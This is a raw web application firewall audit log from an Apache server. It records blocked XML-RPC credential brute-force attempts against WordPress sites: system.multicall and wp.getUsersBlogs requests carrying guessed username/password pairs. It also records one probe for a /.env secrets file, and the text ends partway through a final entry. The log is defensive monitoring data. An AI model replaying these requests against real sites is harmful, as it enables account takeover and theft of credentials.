[05/Jun/2025:15:14:33 +0700] aEFR6SrHpfaS2Cuwh8XWegAAAEs 103.236.140.4 40716 103.236.140.4 8181 --5e6a1c40-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.204.239.125 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.204.239.125 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --5e6a1c40-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminP@ssword --5e6a1c40-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5e6a1c40-E-- --5e6a1c40-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.204.239.125 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749111273555198 5856 (- - -) Stopwatch2: 1749111273555198 5856; combined=4152, p1=509, p2=3476, p3=0, p4=0, p5=99, sr=96, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e6a1c40-Z-- --8fdf1229-A-- [05/Jun/2025:15:17:14 +0700] aEFSiirHpfaS2Cuwh8XWhwAAAEE 103.236.140.4 40778 103.236.140.4 8181 --8fdf1229-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 101.100.220.131 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 101.100.220.131 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --8fdf1229-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehz43218765z --8fdf1229-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8fdf1229-E-- --8fdf1229-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 101.100.220.131 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749111434466586 4600 (- - -) Stopwatch2: 1749111434466586 4600; combined=3513, p1=388, p2=2967, p3=0, p4=0, p5=92, sr=80, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8fdf1229-Z-- --1c1a7f30-A-- [05/Jun/2025:15:21:02 +0700] aEFTblwdJdhOudw5hdzQlwAAAIc 103.236.140.4 40876 103.236.140.4 8181 --1c1a7f30-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 101.100.220.131 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 101.100.220.131 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --1c1a7f30-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminantix001 --1c1a7f30-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c1a7f30-E-- --1c1a7f30-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 101.100.220.131 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749111662707449 5624 (- - -) Stopwatch2: 1749111662707449 5624; combined=3974, p1=497, p2=3302, p3=0, p4=0, p5=103, sr=94, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c1a7f30-Z-- --09bf297a-A-- [05/Jun/2025:15:25:29 +0700] aEFUeVwdJdhOudw5hdzQtQAAAIQ 103.236.140.4 41528 103.236.140.4 8181 --09bf297a-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 175.117.144.122 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 175.117.144.122 X-Forwarded-Proto: https Connection: close Content-Length: 486 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --09bf297a-C-- system.multicallmethodNamewp.getUsersBlogsparamswordpressw0rdpr3ss --09bf297a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --09bf297a-E-- --09bf297a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 175.117.144.122 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749111929346322 5364 (- - -) Stopwatch2: 1749111929346322 5364; combined=3894, p1=463, p2=3268, p3=0, p4=0, p5=96, sr=86, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --09bf297a-Z-- --2976c30b-A-- [05/Jun/2025:15:27:10 +0700] aEFU3irHpfaS2Cuwh8XXuAAAAFQ 103.236.140.4 46488 103.236.140.4 8181 --2976c30b-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 175.117.144.122 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 175.117.144.122 X-Forwarded-Proto: https Connection: close Content-Length: 485 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --2976c30b-C-- system.multicallmethodNamewp.getUsersBlogsparamsmatraca1234567890 --2976c30b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2976c30b-E-- --2976c30b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 175.117.144.122 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749112030698358 5626 (- - -) Stopwatch2: 1749112030698358 5626; combined=4051, p1=501, p2=3370, p3=0, p4=0, p5=105, sr=94, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2976c30b-Z-- --57511766-A-- [05/Jun/2025:15:28:34 +0700] aEFVMuth7G2xELALzPYoJQAAANg 103.236.140.4 50692 103.236.140.4 8181 --57511766-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 175.117.144.122 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 175.117.144.122 X-Forwarded-Proto: https Connection: close Content-Length: 486 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --57511766-C-- system.multicallmethodNamewp.getUsersBlogsparamsolivierOlivier123! --57511766-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --57511766-E-- --57511766-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 175.117.144.122 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749112114446612 5460 (- - -) Stopwatch2: 1749112114446612 5460; combined=4321, p1=494, p2=3649, p3=0, p4=0, p5=105, sr=85, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --57511766-Z-- --3e5d7261-A-- [05/Jun/2025:15:28:50 +0700] aEFVQuth7G2xELALzPYoVQAAANE 103.236.140.4 51504 103.236.140.4 8181 --3e5d7261-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 159.223.35.88 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 159.223.35.88 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --3e5d7261-C-- system.multicallmethodNamewp.getUsersBlogsparamseditorEditor@123 --3e5d7261-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3e5d7261-E-- --3e5d7261-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 159.223.35.88 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749112130504506 5713 (- - -) Stopwatch2: 1749112130504506 5713; combined=4193, p1=481, p2=3533, p3=0, p4=0, p5=104, sr=86, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3e5d7261-Z-- --c1224845-A-- [05/Jun/2025:15:29:40 +0700] aEFVdCrHpfaS2Cuwh8XZKAAAAEY 103.236.140.4 54036 103.236.140.4 8181 --c1224845-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 175.117.144.122 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 175.117.144.122 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --c1224845-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminantix_123 --c1224845-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c1224845-E-- --c1224845-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 175.117.144.122 (1+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749112180049192 5298 (- - -) Stopwatch2: 1749112180049192 5298; combined=3923, p1=479, p2=3282, p3=0, p4=0, p5=95, sr=89, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c1224845-Z-- --c9ea4b5a-A-- [05/Jun/2025:15:31:57 +0700] aEFV_SrHpfaS2Cuwh8XcGwAAAEc 103.236.140.4 60754 103.236.140.4 8181 --c9ea4b5a-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 134.122.28.88 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 134.122.28.88 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --c9ea4b5a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c9ea4b5a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749112317698486 682 (- - -) Stopwatch2: 1749112317698486 682; combined=285, p1=248, p2=0, p3=0, p4=0, p5=37, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c9ea4b5a-Z-- --4276d00d-A-- [05/Jun/2025:15:38:26 +0700] aEFXgirHpfaS2Cuwh8XhggAAAE8 103.236.140.4 51634 103.236.140.4 8181 --4276d00d-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.53.96.137 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.53.96.137 X-Forwarded-Proto: https Connection: close Content-Length: 490 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --4276d00d-C-- system.multicallmethodNamewp.getUsersBlogsparamscomprasexpressAbcd1234 --4276d00d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4276d00d-E-- --4276d00d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.53.96.137 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749112706290194 5534 (- - -) Stopwatch2: 1749112706290194 5534; combined=4136, p1=474, p2=3507, p3=0, p4=0, p5=93, sr=83, sw=62, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4276d00d-Z-- --bffb240d-A-- [05/Jun/2025:15:40:20 +0700] aEFX9H-K7ToMdu-YSIIxCQAAAAA 103.236.140.4 57462 103.236.140.4 8181 --bffb240d-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.53.96.137 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.53.96.137 X-Forwarded-Proto: https Connection: close Content-Length: 475 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --bffb240d-C-- system.multicallmethodNamewp.getUsersBlogsparamsuser123 --bffb240d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bffb240d-E-- --bffb240d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.53.96.137 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749112820161229 4451 (- - -) Stopwatch2: 1749112820161229 4451; combined=3023, p1=390, p2=2504, p3=0, p4=0, p5=76, sr=81, sw=53, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bffb240d-Z-- --3c7e1f19-A-- [05/Jun/2025:15:46:15 +0700] aEFZVyrHpfaS2Cuwh8XnXwAAAEA 103.236.140.4 46696 103.236.140.4 8181 --3c7e1f19-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.180.134.27 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.180.134.27 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --3c7e1f19-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminantix@123$ --3c7e1f19-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3c7e1f19-E-- --3c7e1f19-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.180.134.27 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749113175694187 5426 (- - -) Stopwatch2: 1749113175694187 5426; combined=3960, p1=489, p2=3312, p3=0, p4=0, p5=98, sr=85, sw=61, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3c7e1f19-Z-- --34274961-A-- [05/Jun/2025:15:47:05 +0700] aEFZiH-K7ToMdu-YSII3QwAAABU 103.236.140.4 49148 103.236.140.4 8181 --34274961-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 184.168.99.84 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 184.168.99.84 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --34274961-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminantix@2025 --34274961-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --34274961-E-- --34274961-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 184.168.99.84 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749113224996842 5896 (- - -) Stopwatch2: 1749113224996842 5896; combined=4497, p1=551, p2=3705, p3=0, p4=0, p5=146, sr=86, sw=95, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --34274961-Z-- --54a5706e-A-- [05/Jun/2025:15:47:15 +0700] aEFZk1wdJdhOudw5hdzeHwAAAIQ 103.236.140.4 49678 103.236.140.4 8181 --54a5706e-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.53.96.137 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.53.96.137 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --54a5706e-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminPa55word --54a5706e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --54a5706e-E-- --54a5706e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.53.96.137 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749113235957477 6131 (- - -) Stopwatch2: 1749113235957477 6131; combined=4556, p1=526, p2=3771, p3=0, p4=0, p5=146, sr=90, sw=113, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --54a5706e-Z-- --52529b08-A-- [05/Jun/2025:15:53:20 +0700] aEFbAH-K7ToMdu-YSII8BQAAABE 103.236.140.4 39856 103.236.140.4 8181 --52529b08-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --52529b08-C-- wp.getUsersBlogs admin 12345678 --52529b08-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --52529b08-E-- --52529b08-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749113600208145 5409 (- - -) Stopwatch2: 1749113600208145 5409; combined=3877, p1=462, p2=3221, p3=0, p4=0, p5=110, sr=87, sw=84, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --52529b08-Z-- --c475cc71-A-- [05/Jun/2025:15:54:23 +0700] aEFbP-th7G2xELALzPY5dgAAAMg 103.236.140.4 43162 103.236.140.4 8181 --c475cc71-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --c475cc71-C-- wp.getUsersBlogs admin r007pd8skdgSejrd --c475cc71-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c475cc71-E-- --c475cc71-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (69+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749113663178410 5086 (- - -) Stopwatch2: 1749113663178410 5086; combined=3844, p1=447, p2=3227, p3=0, p4=0, p5=100, sr=92, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c475cc71-Z-- --abdaf072-A-- [05/Jun/2025:15:55:14 +0700] aEFbcirHpfaS2Cuwh8XuAgAAAEE 103.236.140.4 45760 103.236.140.4 8181 --abdaf072-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.180.134.27 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.180.134.27 X-Forwarded-Proto: https Connection: close Content-Length: 478 Accept: */* Accept-Language: ru-RU,ru;q=0.9 